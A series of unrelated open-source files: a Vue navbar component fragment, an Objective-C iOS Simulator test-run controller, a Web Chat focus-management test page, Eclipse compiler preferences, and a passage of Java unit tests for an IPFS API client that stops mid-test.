      return this.$themeLocaleConfig.algolia || this.$site.themeConfig.algolia || {}
    },

    // Algolia search is enabled only when both apiKey and indexName are set.
    isAlgoliaSearch() {
      return this.algolia && this.algolia.apiKey && this.algolia.indexName
    }
  }
}

function css(el, property) {
  // NOTE: Known bug, will return 'auto' if style value is 'auto'
  const win = el.ownerDocument.defaultView
  // null means not to return pseudo styles
  return win.getComputedStyle(el, null)[property]
}
</script>

<style lang="stylus">
$navbar-vertical-padding = 0.7rem
$navbar-horizontal-padding = 1.5rem

.navbar
  padding $navbar-vertical-padding $navbar-horizontal-padding
  line-height $navbarHeight - 1.4rem
  a, span, img
    display inline-block
  .logo
    height $navbarHeight - 1.4rem
    min-width $navbarHeight - 1.4rem
    margin-right 0.8rem
    vertical-align top
  .site-name
    font-size 1.3rem
    font-weight 600
    color $textColor
    position relative
  .links
    padding-left 1.5rem
    box-sizing border-box
    background-color white
    white-space nowrap
    font-size 0.9rem
    position absolute
    right $navbar-horizontal-padding
    top $navbar-vertical-padding
    display flex
    .search-box
      flex: 0 0 auto
      vertical-align top

@media (max-width: $MQMobile)
  .navbar
    padding-left 4rem
    .can-hide
      display none
    .links
      padding-left 1.5rem
    .site-name
      width calc(100vw - 9.4rem)
      overflow hidden
      white-space nowrap
      text-overflow ellipsis
  .notice-bd
    display:none!important
</style>
{ "pile_set_name": "Github" }
//
//  ZappSimulatorController.m
//  Zapp
//
//  Created by Jim Puls on 8/16/11.
//  Licensed to Square, Inc. under one or more contributor license agreements.
//  See the LICENSE file distributed with this work for the terms under
//  which Square, Inc. licenses this file to you.

// Drives a single iOS Simulator run: launches the app under test through a
// DTiPhoneSimulatorSession, polls the app's redirected stdout/stderr file
// once per second, optionally records video, and reports completion back on
// the queue that started the run.
// NOTE(review): DTiPhoneSimulator* appear to be private Xcode framework
// classes (declared outside this file) — behavior described here is only
// what this file itself shows.

#import "ZappSimulatorController.h"
#import "ZappVideoController.h"
#include <sys/stat.h>

@interface ZappSimulatorController ()

// Called exactly once when the run ends; argument is (error != nil).
@property (copy) ZappResultBlock completionBlock;
// Read handle on the file the simulated app's stdout/stderr is written to.
@property (strong) NSFileHandle *fileHandle;
// The live simulator session; nil once the run has been torn down.
@property (strong) DTiPhoneSimulatorSession *session;
// Receives each newly-read chunk of app output; may set *stop.
@property (copy) ZappIntermediateOutputBlock outputBlock;
// Number of 1-second polls in a row that produced no output.
@property NSInteger consecutiveBlankReads;
// YES once at least one non-empty read has happened this run.
@property BOOL hasSuccessfulRead;
@property (strong) ZappVideoController *videoController;
// Queue that invoked launchSession...; completion is posted back to it.
@property (weak) NSOperationQueue *callingQueue;

- (void)readNewOutput;
- (void)clearSession;

@end

@implementation ZappSimulatorController

@synthesize appURL;
@synthesize arguments;
@synthesize callingQueue;
@synthesize completionBlock;
@synthesize consecutiveBlankReads;
@synthesize environment;
@synthesize fileHandle;
@synthesize hasSuccessfulRead;
@synthesize platform;
@synthesize sdk;
@synthesize session;
@synthesize simulatorOutputPath;
@synthesize outputBlock;
@synthesize videoController;
@synthesize videoOutputURL;

// Configures and starts a simulator session for self.appURL.
// Must be called off the main thread; the actual launch is hopped onto the
// main queue. Returns NO only when the application specifier cannot be
// built; a later launch failure is logged but not reported as NO.
- (BOOL)launchSessionWithOutputBlock:(ZappIntermediateOutputBlock)theOutputBlock completionBlock:(ZappResultBlock)theCompletionBlock;
{
    NSAssert(![NSThread isMainThread], @"%s called from main thread", _cmd);
    NSString *path = self.appURL.path;
    DTiPhoneSimulatorApplicationSpecifier *specifier = [DTiPhoneSimulatorApplicationSpecifier specifierWithApplicationPath:path];
    if (!specifier) {
        NSLog(@"Could not load application specifier for '%@'", path);
        return NO;
    }

    // Reset per-run state before anything asynchronous starts.
    self.outputBlock = theOutputBlock;
    self.completionBlock = theCompletionBlock;
    self.callingQueue = [NSOperationQueue currentQueue];
    self.hasSuccessfulRead = NO;
    self.consecutiveBlankReads = 0;

    DTiPhoneSimulatorSystemRoot *simulator = [DTiPhoneSimulatorSystemRoot rootWithSDKVersion:self.sdk];
    DTiPhoneSimulatorSessionConfig *config = [DTiPhoneSimulatorSessionConfig new];
    config.applicationToSimulateOnStart = specifier;
    config.simulatedSystemRoot = simulator;
    config.simulatedDeviceFamily = [NSNumber numberWithInteger:self.platform];
    config.simulatedApplicationShouldWaitForDebugger = NO;
    config.simulatedApplicationLaunchArgs = self.arguments;
    config.simulatedApplicationLaunchEnvironment = self.environment;
    config.localizedClientName = [[NSRunningApplication currentApplication] localizedName];
    // stdout and stderr are both redirected into the same file, which
    // readNewOutput polls below.
    config.simulatedApplicationStdOutPath = self.simulatorOutputPath;
    config.simulatedApplicationStdErrPath = self.simulatorOutputPath;

    self.session = [DTiPhoneSimulatorSession new];
    session.delegate = self;

    // Seek to the end so only output produced by THIS run is reported.
    self.fileHandle = [NSFileHandle fileHandleForReadingAtPath:self.simulatorOutputPath];
    [fileHandle seekToEndOfFile];

    // Wipe the previously-installed apps folder so the app is installed
    // fresh. The folder name is keyed off the SDK version.
    // NOTE(review): only "5.0" and "4.3.2" are handled — other SDK
    // versions fall through to "4.3.2"; confirm this covers all targets.
    NSFileManager *fileManager = [NSFileManager defaultManager];
    NSError *error = nil;
    NSString *pathComponent = [NSString stringWithFormat:@"iPhone Simulator/%@/Applications", [self.sdk isEqualToString:@"5.0"] ? @"5.0" : @"4.3.2"];
    NSURL *simulatorAppsURL = [[fileManager URLForDirectory:NSApplicationSupportDirectory inDomain:NSUserDomainMask appropriateForURL:nil create:NO error:&error] URLByAppendingPathComponent:pathComponent];
    NSAssert(!error, @"Got an error finding the simulator applications folder");
    if ([fileManager fileExistsAtPath:simulatorAppsURL.path]) {
        [fileManager removeItemAtURL:simulatorAppsURL error:&error];
        NSAssert(!error, @"Got an error deleting the simulator applications folder");
    }

    // Derive the "iPhone Simulator.app" location from the SDK root
    // (two directories up, then Applications/iPhone Simulator.app).
    NSURL *simulatorURL = [NSURL fileURLWithPath:simulator.sdkRootPath];
    simulatorURL = [[simulatorURL URLByDeletingLastPathComponent] URLByDeletingLastPathComponent];
    simulatorURL = [[simulatorURL URLByAppendingPathComponent:@"Applications"] URLByAppendingPathComponent:@"iPhone Simulator.app"];

    // Launch + session start must happen on the main queue; output polling
    // is kicked off from there as well.
    [[NSOperationQueue mainQueue] addOperationWithBlock:^() {
        NSError *error = nil;
        [[NSWorkspace sharedWorkspace] launchApplicationAtURL:simulatorURL options:NSWorkspaceLaunchDefault configuration:nil error:&error];
        if (![session requestStartWithConfig:config timeout:30.0 error:&error]) {
            // NOTE(review): on this failure path the completionBlock is
            // never invoked — callers waiting on it would hang; verify.
            NSLog(@"Could not start simulator session: %@", error);
            return;
        }
        NSArray *runningApplications = [NSRunningApplication runningApplicationsWithBundleIdentifier:@"com.apple.iphonesimulator"];
        NSRunningApplication *simulator = [runningApplications lastObject];
        [simulator activateWithOptions:(NSApplicationActivateAllWindows | NSApplicationActivateIgnoringOtherApps)];
        [self readNewOutput];
    }];

    return YES;
}

#pragma mark DTiPhoneSimulatorSessionDelegate

// Session started: begin video capture if a video output URL was requested.
- (void)session:(DTiPhoneSimulatorSession *)session didStart:(BOOL)started withError:(NSError *)error;
{
    if (self.videoOutputURL) {
        NSLog(@"started: %@", error);
        self.videoController = [ZappVideoController new];
        self.videoController.outputURL = self.videoOutputURL;
        [self.videoController start];
    }
}

// Session ended (either for real, or synthesized by readNewOutput when the
// output goes quiet). Tears everything down and reports completion on the
// original calling queue; the completion argument is YES iff error != nil.
- (void)session:(DTiPhoneSimulatorSession *)session didEndWithError:(NSError *)error;
{
    NSLog(@"ended: %@", error);
    if (!error) {
        // Holy buckets, the simulator ended correctly! Read the output once more.
        [self readNewOutput];
    }
    [self clearSession];
    [self.callingQueue addOperationWithBlock:^{
        self.completionBlock(error != nil);
    }];
}

#pragma mark Private methods

// Force-quits any running simulator via /usr/bin/killall; blocks until
// the kill task exits.
+ (void)killSimulator;
{
    NSTask *killTask = [NSTask new];
    killTask.launchPath = @"/usr/bin/killall";
    killTask.arguments = [NSArray arrayWithObject:@"iPhone Simulator"];
    [killTask launch];
    [killTask waitUntilExit];
}

// Releases the session and video controller and kills the simulator.
// Nil-ing self.session is what stops the readNewOutput polling loop.
- (void)clearSession;
{
    self.session.delegate = nil;
    self.session = nil;
    [self.videoController stop];
    self.videoController = nil;
    [ZappSimulatorController killSimulator];
}

// Polls the redirected output file once per second while a session exists.
// Forwards any new bytes (decoded as UTF-8) to outputBlock; after 30
// consecutive empty reads — or when the outputBlock sets *stop — ends the
// run with a synthesized error (code 1 if any output was ever seen,
// code 2 if the app never produced output).
- (void)readNewOutput;
{
    if (!self.session) {
        return;
    }

    NSData *outputData = [self.fileHandle readDataToEndOfFile];
    BOOL shouldStop = NO;
    if (outputData.length) {
        self.outputBlock([[NSString alloc] initWithData:outputData encoding:NSUTF8StringEncoding], &shouldStop);
        self.consecutiveBlankReads = 0;
        self.hasSuccessfulRead = YES;
    } else {
        self.consecutiveBlankReads++;
        if (self.consecutiveBlankReads > 30) {
            shouldStop = YES;
        }
    }

    if (shouldStop) {
        if (self.hasSuccessfulRead) {
            [self session:self.session didEndWithError:[NSError errorWithDomain:NSStringFromClass([self class]) code:1 userInfo:nil]];
        } else {
            [self session:self.session didEndWithError:[NSError errorWithDomain:NSStringFromClass([self class]) code:2 userInfo:nil]];
        }
    }

    // didEndWithError: clears self.session, so this reschedules only while
    // the run is still alive; otherwise the file handle is closed.
    if (self.session) {
        [self performSelector:@selector(readNewOutput) withObject:nil afterDelay:1.0];
    } else {
        [self.fileHandle closeFile];
    }
}

@end
{ "pile_set_name": "Github" }
<!DOCTYPE html>
<html lang="en-US">
  <head>
    <!-- Added: charset must appear early in <head>; a <title> is required markup. -->
    <meta charset="utf-8">
    <title>Web Chat focus management test: shift-tab from receipt card image</title>
    <script crossorigin="anonymous" src="/__dist__/testharness.js"></script>
    <script crossorigin="anonymous" src="/__dist__/webchat-es5.js"></script>
    <!-- Fixed: <link> is a void element (no self-closing slash); type="text/css" is the default and omitted. -->
    <link rel="stylesheet" href="focusManagement.css">
  </head>
  <body>
    <div id="webchat"></div>
    <script type="text/babel" data-presets="env,stage-3,react">
      const {
        conditions,
        createStore,
        elements,
        expect,
        host,
        pageObjects,
        shareObservable,
        timeouts,
        token
      } = window.WebChatTest;

      const {
        Components: { AdaptiveCardContent }
      } = window.WebChat;

      (async function() {
        const store = createStore();
        const directLine = window.WebChat.createDirectLine({ token: await token.fetchDirectLineToken() });
        const baseProps = { directLine, store };
        const webChatElement = document.getElementById('webchat');

        window.WebChat.renderWebChat(baseProps, webChatElement);

        await pageObjects.wait(conditions.uiConnected(), timeouts.directLine);
        await pageObjects.sendMessageViaSendBox('receiptcard', { waitForSend: true });

        await pageObjects.wait(conditions.minNumActivitiesShown(2), timeouts.directLine);
        await pageObjects.wait(conditions.scrollToBottomCompleted(), timeouts.directLine);

        document.querySelector('img[tabindex="0"]').focus();

        await host.sendShiftTab();

        const focusingOnRoot = document.activeElement === document.querySelector('.webchat__adaptive-card-renderer').firstChild;

        expect(focusingOnRoot).toBe(true);

        // The whole card should become yellow as the focus moved on it.
        await host.snapshot();

        await host.done();
      })().catch(async err => {
        console.error(err);

        await host.error(err);
      });
    </script>
  </body>
</html>
{ "pile_set_name": "Github" }
eclipse.preferences.version=1 org.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled org.eclipse.jdt.core.compiler.codegen.targetPlatform=12 org.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve org.eclipse.jdt.core.compiler.compliance=12 org.eclipse.jdt.core.compiler.debug.lineNumber=generate org.eclipse.jdt.core.compiler.debug.localVariable=generate org.eclipse.jdt.core.compiler.debug.sourceFile=generate org.eclipse.jdt.core.compiler.problem.assertIdentifier=error org.eclipse.jdt.core.compiler.problem.enablePreviewFeatures=disabled org.eclipse.jdt.core.compiler.problem.enumIdentifier=error org.eclipse.jdt.core.compiler.problem.reportPreviewFeatures=warning org.eclipse.jdt.core.compiler.release=enabled org.eclipse.jdt.core.compiler.source=12
{ "pile_set_name": "Github" }
package io.ipfs.api; import io.ipfs.api.cbor.*; import io.ipfs.cid.*; import io.ipfs.multihash.Multihash; import io.ipfs.multiaddr.MultiAddress; import org.junit.*; import java.io.*; import java.nio.file.*; import java.util.*; import java.util.concurrent.*; import java.util.function.*; import java.util.stream.*; import static org.junit.Assert.assertTrue; public class APITest { private final IPFS ipfs = new IPFS(new MultiAddress("/ip4/127.0.0.1/tcp/5001")); private final Random r = new Random(33550336); // perfect @Test public void dag() throws IOException { String original = "{\"data\":1234}"; byte[] object = original.getBytes(); MerkleNode put = ipfs.dag.put("json", object); Cid expected = Cid.decode("zdpuAs3whHmb9T1NkHSLGF45ykcKrEBxSLiEx6YpLzmKbQLEB"); Multihash result = put.hash; Assert.assertTrue("Correct cid returned", result.equals(expected)); byte[] get = ipfs.dag.get(expected); Assert.assertTrue("Raw data equal", original.equals(new String(get).trim())); } @Test public void dagCbor() throws IOException { Map<String, CborObject> tmp = new LinkedHashMap<>(); String value = "G'day mate!"; tmp.put("data", new CborObject.CborString(value)); CborObject original = CborObject.CborMap.build(tmp); byte[] object = original.toByteArray(); MerkleNode put = ipfs.dag.put("cbor", object); Cid cid = (Cid) put.hash; byte[] get = ipfs.dag.get(cid); Assert.assertTrue("Raw data equal", ((Map)JSONParser.parse(new String(get))).get("data").equals(value)); Cid expected = Cid.decode("zdpuApemz4XMURSCkBr9W5y974MXkSbeDfLeZmiQTPpvkatFF"); Assert.assertTrue("Correct cid returned", cid.equals(expected)); } @Test public void keys() throws IOException { List<KeyInfo> existing = ipfs.key.list(); String name = "mykey" + System.nanoTime(); KeyInfo gen = ipfs.key.gen(name, Optional.of("rsa"), Optional.of("2048")); String newName = "bob" + System.nanoTime(); Object rename = ipfs.key.rename(name, newName); List<KeyInfo> rm = ipfs.key.rm(newName); List<KeyInfo> remaining = ipfs.key.list(); 
Assert.assertTrue("removed key", remaining.equals(existing)); } @Test public void ipldNode() { Function<Stream<Pair<String, CborObject>>, CborObject.CborMap> map = s -> CborObject.CborMap.build(s.collect(Collectors.toMap(p -> p.left, p -> p.right))); CborObject.CborMap a = map.apply(Stream.of(new Pair<>("b", new CborObject.CborLong(1)))); CborObject.CborMap cbor = map.apply(Stream.of(new Pair<>("a", a), new Pair<>("c", new CborObject.CborLong(2)))); IpldNode.CborIpldNode node = new IpldNode.CborIpldNode(cbor); List<String> tree = node.tree("", -1); Assert.assertTrue("Correct tree", tree.equals(Arrays.asList("/a/b", "/c"))); } @Test public void singleFileTest() throws IOException { NamedStreamable.ByteArrayWrapper file = new NamedStreamable.ByteArrayWrapper("hello.txt", "G'day world! IPFS rocks!".getBytes()); fileTest(file); } @Test public void wrappedSingleFileTest() throws IOException { NamedStreamable.ByteArrayWrapper file = new NamedStreamable.ByteArrayWrapper("hello.txt", "G'day world! 
IPFS rocks!".getBytes()); List<MerkleNode> addParts = ipfs.add(file, true); MerkleNode filePart = addParts.get(0); MerkleNode dirPart = addParts.get(1); byte[] catResult = ipfs.cat(filePart.hash); byte[] getResult = ipfs.get(filePart.hash); if (!Arrays.equals(catResult, file.getContents())) throw new IllegalStateException("Different contents!"); List<Multihash> pinRm = ipfs.pin.rm(dirPart.hash, true); if (!pinRm.get(0).equals(dirPart.hash)) throw new IllegalStateException("Didn't remove file!"); Object gc = ipfs.repo.gc(); } @Test public void dirTest() throws IOException { Path test = Files.createTempDirectory("test"); Files.write(test.resolve("file.txt"), "G'day IPFS!".getBytes()); NamedStreamable dir = new NamedStreamable.FileWrapper(test.toFile()); List<MerkleNode> add = ipfs.add(dir); MerkleNode addResult = add.get(add.size() - 1); List<MerkleNode> ls = ipfs.ls(addResult.hash); Assert.assertTrue(ls.size() > 0); } @Test public void directoryTest() throws IOException { Random rnd = new Random(); String dirName = "folder" + rnd.nextInt(100); Path tmpDir = Files.createTempDirectory(dirName); String fileName = "afile" + rnd.nextInt(100); Path file = tmpDir.resolve(fileName); FileOutputStream fout = new FileOutputStream(file.toFile()); byte[] fileContents = "IPFS rocks!".getBytes(); fout.write(fileContents); fout.flush(); fout.close(); String subdirName = "subdir"; tmpDir.resolve(subdirName).toFile().mkdir(); String subfileName = "subdirfile" + rnd.nextInt(100); Path subdirfile = tmpDir.resolve(subdirName + "/" + subfileName); FileOutputStream fout2 = new FileOutputStream(subdirfile.toFile()); byte[] file2Contents = "IPFS still rocks!".getBytes(); fout2.write(file2Contents); fout2.flush(); fout2.close(); List<MerkleNode> addParts = ipfs.add(new NamedStreamable.FileWrapper(tmpDir.toFile())); MerkleNode addResult = addParts.get(addParts.size() - 1); List<MerkleNode> lsResult = ipfs.ls(addResult.hash); if (lsResult.size() != 2) throw new IllegalStateException("Incorrect 
number of objects in ls!"); if (! lsResult.stream().map(x -> x.name.get()).collect(Collectors.toSet()).equals(new HashSet<>(Arrays.asList(subdirName, fileName)))) throw new IllegalStateException("Dir not returned in ls!"); byte[] catResult = ipfs.cat(addResult.hash, "/" + fileName); if (! Arrays.equals(catResult, fileContents)) throw new IllegalStateException("Different contents!"); byte[] catResult2 = ipfs.cat(addResult.hash, "/" + subdirName + "/" + subfileName); if (! Arrays.equals(catResult2, file2Contents)) throw new IllegalStateException("Different contents!"); } // @Test public void largeFileTest() throws IOException { byte[] largerData = new byte[100*1024*1024]; new Random(1).nextBytes(largerData); NamedStreamable.ByteArrayWrapper largeFile = new NamedStreamable.ByteArrayWrapper("nontrivial.txt", largerData); fileTest(largeFile); } // @Test public void hugeFileStreamTest() throws IOException { byte[] hugeData = new byte[1000*1024*1024]; new Random(1).nextBytes(hugeData); NamedStreamable.ByteArrayWrapper largeFile = new NamedStreamable.ByteArrayWrapper("massive.txt", hugeData); MerkleNode addResult = ipfs.add(largeFile).get(0); InputStream in = ipfs.catStream(addResult.hash); byte[] res = new byte[hugeData.length]; int offset = 0; byte[] buf = new byte[4096]; int r; while ((r = in.read(buf)) >= 0) { try { System.arraycopy(buf, 0, res, offset, r); offset += r; }catch (Exception e){ e.printStackTrace(); } } if (!Arrays.equals(res, hugeData)) throw new IllegalStateException("Different contents!"); } @Test public void hostFileTest() throws IOException { Path tempFile = Files.createTempFile("IPFS", "tmp"); BufferedWriter w = new BufferedWriter(new FileWriter(tempFile.toFile())); w.append("Some data"); w.flush(); w.close(); NamedStreamable hostFile = new NamedStreamable.FileWrapper(tempFile.toFile()); fileTest(hostFile); } @Test public void hashOnly() throws IOException { byte[] data = randomBytes(4096); NamedStreamable file = new 
NamedStreamable.ByteArrayWrapper(data); MerkleNode addResult = ipfs.add(file, false, true).get(0); List<Multihash> local = ipfs.refs.local(); if (local.contains(addResult.hash)) throw new IllegalStateException("Object shouldn't be present!"); } public void fileTest(NamedStreamable file) throws IOException{ MerkleNode addResult = ipfs.add(file).get(0); byte[] catResult = ipfs.cat(addResult.hash); byte[] getResult = ipfs.get(addResult.hash); if (!Arrays.equals(catResult, file.getContents())) throw new IllegalStateException("Different contents!"); List<Multihash> pinRm = ipfs.pin.rm(addResult.hash, true); if (!pinRm.get(0).equals(addResult.hash)) throw new IllegalStateException("Didn't remove file!"); Object gc = ipfs.repo.gc(); } @Test public void pinTest() throws IOException { MerkleNode file = ipfs.add(new NamedStreamable.ByteArrayWrapper("some data".getBytes())).get(0); Multihash hash = file.hash; Map<Multihash, Object> ls1 = ipfs.pin.ls(IPFS.PinType.all); boolean pinned = ls1.containsKey(hash); List<Multihash> rm = ipfs.pin.rm(hash); // second rm should not throw a http 500, but return an empty list // List<Multihash> rm2 = ipfs.pin.rm(hash); List<Multihash> add2 = ipfs.pin.add(hash); // adding something already pinned should succeed List<Multihash> add3 = ipfs.pin.add(hash); Map<Multihash, Object> ls = ipfs.pin.ls(IPFS.PinType.recursive); ipfs.repo.gc(); // object should still be present after gc Map<Multihash, Object> ls2 = ipfs.pin.ls(IPFS.PinType.recursive); boolean stillPinned = ls2.containsKey(hash); Assert.assertTrue("Pinning works", pinned && stillPinned); } @Test public void pinUpdate() throws IOException { MerkleNode child1 = ipfs.add(new NamedStreamable.ByteArrayWrapper("some data".getBytes())).get(0); Multihash hashChild1 = child1.hash; System.out.println("child1: " + hashChild1); CborObject.CborMerkleLink root1 = new CborObject.CborMerkleLink(hashChild1); MerkleNode root1Res = ipfs.block.put(Collections.singletonList(root1.toByteArray()), 
Optional.of("cbor")).get(0); System.out.println("root1: " + root1Res.hash); ipfs.pin.add(root1Res.hash); CborObject.CborList root2 = new CborObject.CborList(Arrays.asList(new CborObject.CborMerkleLink(hashChild1), new CborObject.CborLong(42))); MerkleNode root2Res = ipfs.block.put(Collections.singletonList(root2.toByteArray()), Optional.of("cbor")).get(0); List<Multihash> update = ipfs.pin.update(root1Res.hash, root2Res.hash, true); Map<Multihash, Object> ls = ipfs.pin.ls(IPFS.PinType.all); boolean childPresent = ls.containsKey(hashChild1); if (!childPresent) throw new IllegalStateException("Child not present!"); ipfs.repo.gc(); Map<Multihash, Object> ls2 = ipfs.pin.ls(IPFS.PinType.all); boolean childPresentAfterGC = ls2.containsKey(hashChild1); if (!childPresentAfterGC) throw new IllegalStateException("Child not present!"); } @Test public void rawLeafNodePinUpdate() throws IOException { MerkleNode child1 = ipfs.block.put("some data".getBytes(), Optional.of("raw")); Multihash hashChild1 = child1.hash; System.out.println("child1: " + hashChild1); CborObject.CborMerkleLink root1 = new CborObject.CborMerkleLink(hashChild1); MerkleNode root1Res = ipfs.block.put(Collections.singletonList(root1.toByteArray()), Optional.of("cbor")).get(0); System.out.println("root1: " + root1Res.hash); ipfs.pin.add(root1Res.hash); MerkleNode child2 = ipfs.block.put("G'day new tree".getBytes(), Optional.of("raw")); Multihash hashChild2 = child2.hash; CborObject.CborList root2 = new CborObject.CborList(Arrays.asList( new CborObject.CborMerkleLink(hashChild1), new CborObject.CborMerkleLink(hashChild2), new CborObject.CborLong(42)) ); MerkleNode root2Res = ipfs.block.put(Collections.singletonList(root2.toByteArray()), Optional.of("cbor")).get(0); List<Multihash> update = ipfs.pin.update(root1Res.hash, root2Res.hash, false); } @Test public void indirectPinTest() throws IOException { Multihash EMPTY = ipfs.object._new(Optional.empty()).hash; io.ipfs.api.MerkleNode data = 
ipfs.object.patch(EMPTY, "set-data", Optional.of("childdata".getBytes()), Optional.empty(), Optional.empty()); Multihash child = data.hash; io.ipfs.api.MerkleNode tmp1 = ipfs.object.patch(EMPTY, "set-data", Optional.of("parent1_data".getBytes()), Optional.empty(), Optional.empty()); Multihash parent1 = ipfs.object.patch(tmp1.hash, "add-link", Optional.empty(), Optional.of(child.toString()), Optional.of(child)).hash; ipfs.pin.add(parent1); io.ipfs.api.MerkleNode tmp2 = ipfs.object.patch(EMPTY, "set-data", Optional.of("parent2_data".getBytes()), Optional.empty(), Optional.empty()); Multihash parent2 = ipfs.object.patch(tmp2.hash, "add-link", Optional.empty(), Optional.of(child.toString()), Optional.of(child)).hash; ipfs.pin.add(parent2); ipfs.pin.rm(parent1, true); Map<Multihash, Object> ls = ipfs.pin.ls(IPFS.PinType.all); boolean childPresent = ls.containsKey(child); if (!childPresent) throw new IllegalStateException("Child not present!"); ipfs.repo.gc(); Map<Multihash, Object> ls2 = ipfs.pin.ls(IPFS.PinType.all); boolean childPresentAfterGC = ls2.containsKey(child); if (!childPresentAfterGC) throw new IllegalStateException("Child not present!"); } @Test public void objectPatch() throws IOException { MerkleNode obj = ipfs.object._new(Optional.empty()); Multihash base = obj.hash; // link tests String linkName = "alink"; MerkleNode addLink = ipfs.object.patch(base, "add-link", Optional.empty(), Optional.of(linkName), Optional.of(base)); MerkleNode withLink = ipfs.object.get(addLink.hash); if (withLink.links.size() != 1 || !withLink.links.get(0).hash.equals(base) || !withLink.links.get(0).name.get().equals(linkName)) throw new RuntimeException("Added link not correct!"); MerkleNode rmLink = ipfs.object.patch(addLink.hash, "rm-link", Optional.empty(), Optional.of(linkName), Optional.empty()); if (!rmLink.hash.equals(base)) throw new RuntimeException("Adding not inverse of removing link!"); // data tests // byte[] data = "some random textual data".getBytes(); byte[] data 
= new byte[1024]; new Random().nextBytes(data); MerkleNode patched = ipfs.object.patch(base, "set-data", Optional.of(data), Optional.empty(), Optional.empty()); byte[] patchedResult = ipfs.object.data(patched.hash); if (!Arrays.equals(patchedResult, data)) throw new RuntimeException("object.patch: returned data != stored data!"); MerkleNode twicePatched = ipfs.object.patch(patched.hash, "append-data", Optional.of(data), Optional.empty(), Optional.empty()); byte[] twicePatchedResult = ipfs.object.data(twicePatched.hash); byte[] twice = new byte[2*data.length]; for (int i=0; i < 2; i++) System.arraycopy(data, 0, twice, i*data.length, data.length); if (!Arrays.equals(twicePatchedResult, twice)) throw new RuntimeException("object.patch: returned data after append != stored data!"); } @Test public void refsTest() throws IOException { List<Multihash> local = ipfs.refs.local(); for (Multihash ref: local) { Object refs = ipfs.refs(ref, false); } } @Test public void objectTest() throws IOException { MerkleNode _new = ipfs.object._new(Optional.empty()); Multihash pointer = Multihash.fromBase58("QmPZ9gcCEpqKTo6aq61g2nXGUhM4iCL3ewB6LDXZCtioEB"); MerkleNode object = ipfs.object.get(pointer); List<MerkleNode> newPointer = ipfs.object.put(Arrays.asList(object.toJSONString().getBytes())); List<MerkleNode> newPointer2 = ipfs.object.put("json", Arrays.asList(object.toJSONString().getBytes())); MerkleNode links = ipfs.object.links(pointer); byte[] data = ipfs.object.data(pointer); Map stat = ipfs.object.stat(pointer); } @Test public void blockTest() throws IOException { MerkleNode pointer = new MerkleNode("QmPZ9gcCEpqKTo6aq61g2nXGUhM4iCL3ewB6LDXZCtioEB"); Map stat = ipfs.block.stat(pointer.hash); byte[] object = ipfs.block.get(pointer.hash); List<MerkleNode> newPointer = ipfs.block.put(Arrays.asList("Some random data...".getBytes())); } @Test public void bulkBlockTest() throws IOException { CborObject cbor = new CborObject.CborString("G'day IPFS!"); byte[] raw = cbor.toByteArray(); 
List<MerkleNode> bulkPut = ipfs.block.put(Arrays.asList(raw, raw, raw, raw, raw), Optional.of("cbor")); List<Multihash> hashes = bulkPut.stream().map(m -> m.hash).collect(Collectors.toList()); byte[] result = ipfs.block.get(hashes.get(0)); System.out.println(); } @Ignore // Ignored because ipfs frequently times out internally in the publish call @Test public void publish() throws Exception { // JSON document String json = "{\"name\":\"blogpost\",\"documents\":[]}"; // Add a DAG node to IPFS MerkleNode merkleNode = ipfs.dag.put("json", json.getBytes()); Assert.assertEquals("expected to be zdpuAknRh1Kro2r2xBDKiXyTiwA3Nu5XcmvjRPA1VNjH41NF7" , "zdpuAknRh1Kro2r2xBDKiXyTiwA3Nu5XcmvjRPA1VNjH41NF7", merkleNode.hash.toString()); // Get a DAG node byte[] res = ipfs.dag.get((Cid) merkleNode.hash); Assert.assertEquals("Should be equals", JSONParser.parse(json), JSONParser.parse(new String(res))); // Publish to IPNS Map result = ipfs.name.publish(merkleNode.hash); // Resolve from IPNS String resolved = ipfs.name.resolve(Multihash.fromBase58((String) result.get("Name"))); Assert.assertEquals("Should be equals", resolved, "/ipfs/" + merkleNode.hash.toString()); } @Test public void pubsubSynchronous() throws Exception { String topic = "topic" + System.nanoTime(); List<Map<String, Object>> res = Collections.synchronizedList(new ArrayList<>()); new Thread(() -> { try { ipfs.pubsub.sub(topic, res::add, t -> t.printStackTrace()); } catch (IOException e) { throw new RuntimeException(e);} }).start(); int nMessages = 100; for (int i = 1; i < nMessages; ) { ipfs.pubsub.pub(topic, "Hello!"); if (res.size() >= i) { i++; } } Assert.assertTrue(res.size() > nMessages - 5); // pubsub is not reliable so it loses messages } @Test public void pubsub() throws Exception { String topic = "topic" + System.nanoTime(); Stream<Map<String, Object>> sub = ipfs.pubsub.sub(topic); String data = "Hello!"; Object pub = ipfs.pubsub.pub(topic, data); Object pub2 = ipfs.pubsub.pub(topic, "G'day"); List<Map> 
results = sub.limit(2).collect(Collectors.toList()); Assert.assertTrue( ! results.get(0).equals(Collections.emptyMap())); } private static String toEscapedHex(byte[] in) throws IOException { StringBuilder res = new StringBuilder(); for (byte b : in) { res.append("\\x"); res.append(String.format("%02x", b & 0xFF)); } return res.toString(); } /** * Test that merkle links in values of a cbor map are followed during recursive pins */ @Test public void merkleLinkInMap() throws IOException { Random r = new Random(); CborObject.CborByteArray target = new CborObject.CborByteArray(("g'day IPFS!").getBytes()); byte[] rawTarget = target.toByteArray(); MerkleNode targetRes = ipfs.block.put(Arrays.asList(rawTarget), Optional.of("cbor")).get(0); CborObject.CborMerkleLink link = new CborObject.CborMerkleLink(targetRes.hash); Map<String, CborObject> m = new TreeMap<>(); m.put("alink", link); m.put("arr", new CborObject.CborList(Collections.emptyList())); CborObject.CborMap source = CborObject.CborMap.build(m); byte[] rawSource = source.toByteArray(); MerkleNode sourceRes = ipfs.block.put(Arrays.asList(rawSource), Optional.of("cbor")).get(0); CborObject.fromByteArray(rawSource); List<Multihash> add = ipfs.pin.add(sourceRes.hash); ipfs.repo.gc(); ipfs.repo.gc(); List<Multihash> refs = ipfs.refs(sourceRes.hash, true); Assert.assertTrue("refs returns links", refs.contains(targetRes.hash)); byte[] bytes = ipfs.block.get(targetRes.hash); Assert.assertTrue("same contents after GC", Arrays.equals(bytes, rawTarget)); // These commands can be used to reproduce this on the command line String reproCommand1 = "printf \"" + toEscapedHex(rawTarget) + "\" | ipfs block put --format=cbor"; String reproCommand2 = "printf \"" + toEscapedHex(rawSource) + "\" | ipfs block put --format=cbor"; System.out.println(); } @Test public void recursiveRefs() throws IOException { CborObject.CborByteArray leaf1 = new CborObject.CborByteArray(("G'day IPFS!").getBytes()); byte[] rawLeaf1 = leaf1.toByteArray(); 
